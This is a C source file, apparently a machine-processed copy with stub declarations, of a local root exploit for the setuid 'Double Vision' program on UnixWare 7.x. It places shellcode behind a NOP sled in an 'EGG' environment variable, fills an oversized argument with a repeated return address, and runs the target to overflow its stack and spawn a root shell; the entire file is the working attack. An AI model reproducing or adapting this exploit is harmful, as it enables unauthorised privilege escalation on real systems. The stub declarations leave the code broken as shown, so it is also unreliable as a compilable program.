
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int retlen ;
typedef int retbuf ;


 int EOF ;
 int NOP ;
 int addr ;
 char** arg ;
 int atoi (int ) ;
 char** env ;
 int execve (char*,char**,char**) ;
 char* exefile ;
 int exit (int) ;
 int getopt (int,char**,char*) ;
 int memcpy (char*,...) ;
 int memset (char*,int ,int) ;
 int optarg ;
 int optind ;
 int printf (char*,...) ;
 char* scoshell ;
 int setbuf (int ,char*) ;
 int stdout ;
 int strcpy (char**,char*) ;
 int strlen (char*) ;
 int strtol (int ,int ,int) ;

int main(int argc, char *argv[])
{
int c;
int i;
char egg[1024];
int egglen = sizeof egg - 1;
int retlen = 2048;
char retbuf[5000];
int align = 0;
char *p;

        setbuf(stdout, (char *)0 );

        while ( (c = getopt(argc, argv, "a:r:l:")) != EOF )
        {
                switch (c)
                {
                  case 'a': addr = strtol(optarg, 0, 16); break;
                  case 'l': align = atoi(optarg); break;
                  case 'r': retlen = atoi(optarg); break;
                }
        }

        if ( optind < argc )
                exefile = argv[optind++];

        printf("UnixWare 7.x exploit for suid root Double Vision\n");
        printf("Stephen Friedl <steve@unixwiz.net>\n");
        printf("Using addr=0x%x   retlen=%d\n", addr, retlen);





        if ( retlen > sizeof(retbuf) )
        {
                printf("ERROR: retlen can't be > %d\n", sizeof(retlen));
                exit(1);
        }

        p = (char *)&addr;

        if ( !p[0] || !p[1] || !p[2] || !p[3] )
        {
                printf("ERROR: ret address 0x%08lx has a zero byte!\n", addr);
                exit(1);
        }
        strcpy(&retbuf, "XXXX");

        for (i = align; i < retlen - 4; i += 4)
        {
                memcpy(retbuf+i, &addr, 4);
        }
        retbuf[i] = 0;

        printf("strlen(retbuf) = %d\n", strlen( (char *)retbuf) );
        memset(egg, NOP, egglen);
        memcpy(egg, "EGG=", 4);


        memcpy(egg + (egglen - strlen(scoshell)- 1), scoshell, strlen(scoshell));

        egg[egglen] = '\0';



        arg[0] = exefile;
        arg[1] = "dvexploit";
        arg[2] = (char *)retbuf;
        arg[3] = 0;





        env[0] = egg;
        env[1] = 0;

        execve(arg[0], arg, env);
}
